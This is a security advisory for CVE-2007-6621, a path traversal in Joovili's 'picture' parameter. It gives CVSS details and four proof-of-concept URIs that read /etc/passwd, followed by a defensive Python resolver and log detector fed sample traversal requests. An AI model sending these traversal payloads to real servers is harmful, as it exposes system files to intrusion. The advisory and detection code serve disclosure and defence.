CVE-2007-6621 - Path Traversal vulnerability in Joovili 3.0.6

Publication

2008-01-04

Last modification

2017-09-29

Summary

Directory traversal vulnerability in joovili.images.php in Joovili 3.0.0 through 3.0.6 allows remote attackers to read arbitrary files via a .. (dot dot) in the picture parameter.

Description

Joovili 'picture' Parameter Multiple Local File Include Vulnerabilities

Joovili is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these issues to execute arbitrary local scripts and retrieve potentially sensitive information.

These versions are affected:

  • Joovili 3.0.6 (and prior)
  • Joovili 2.x (and prior)

Solution

Joovili 'picture' Parameter Multiple Local File Include Vulnerabilities

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: info@vumetric.com.

Exploit

Joovili 'picture' Parameter Multiple Local File Include Vulnerabilities

An attacker can exploit this issue with a browser. The following proof-of-concept URIs are available:

Joovili 2.x:

  • http://www.example.com/include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
  • http://www.example.com/include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

Joovili 3.x:

  • http://www.example.com/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
  • http://www.example.com/joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
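The following is an added, constructed example (not Joovili's code nor part of the original advisory): a hardened resolver that confines a 'picture' value to an images directory and rejects the traversal spellings above (including the '../..//' form), plus a detector that flags the same pattern in access-log lines. The directory /var/www/joovili/images and the sample log lines are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

IMAGE_ROOT = os.path.realpath("/var/www/joovili/images")  # assumed layout


def resolve_picture(picture, root=IMAGE_ROOT):
    """Return the absolute path for a picture name, or None if it escapes root.
    realpath collapses '..', repeated '/' and symlinks, so the '../..//'
    variant is normalised exactly like plain '../'. An absolute value makes
    os.path.join discard root, so it also fails the containment check."""
    if not picture or "\x00" in picture:
        return None
    candidate = os.path.realpath(os.path.join(root, picture))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


# A '..' path segment, with either slash style, anywhere in the value.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def picture_param_is_traversal(uri):
    """True if the 'picture' query parameter of a request URI holds a '..'
    segment. parse_qs decodes percent-encoding once; unquote handles a
    second layer, so '..%2F' and '..%252F' are both caught."""
    for value in parse_qs(urlsplit(uri).query).get("picture", []):
        if TRAVERSAL_RE.search(unquote(value)):
            return True
    return False


# Constructed access-log lines (not real traffic) for the detector below.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jan/2008:10:00:00 +0000] "GET /joovili.images.php?picture=user/avatar.jpg&thumbnail=TRUE HTTP/1.1" 200 4821',
    '10.0.0.9 - - [04/Jan/2008:10:00:07 +0000] "GET /joovili.images.php?picture=../..//../..//../..//etc/passwd&thumbnail=FALSE HTTP/1.1" 200 1043',
    '10.0.0.9 - - [04/Jan/2008:10:00:09 +0000] "GET /joovili.images.php?picture=..%2F..%2F..%2Fetc%2Fpasswd&thumbnail=FALSE HTTP/1.1" 200 1043',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_traversal_requests(lines):
    """Return the log lines whose request URI carries a traversal 'picture' value."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and picture_param_is_traversal(m.group(1)):
            hits.append(line)
    return hits
```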

Classification

CWE-22 - Path Traversal

Risk level (CVSS AV:N/AC:L/Au:N/C:P/I:P/A:N)

Medium (6.4)

Access Vector: Network
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None

Affected Products

Vendor    Product    Versions
Joovili   Joovili    3.0.6

Related CVE

Date         CVE            Title                                             CVSS
2008-01-04   CVE-2007-6620  Path Traversal vulnerability in Joovili 3.0.6     Medium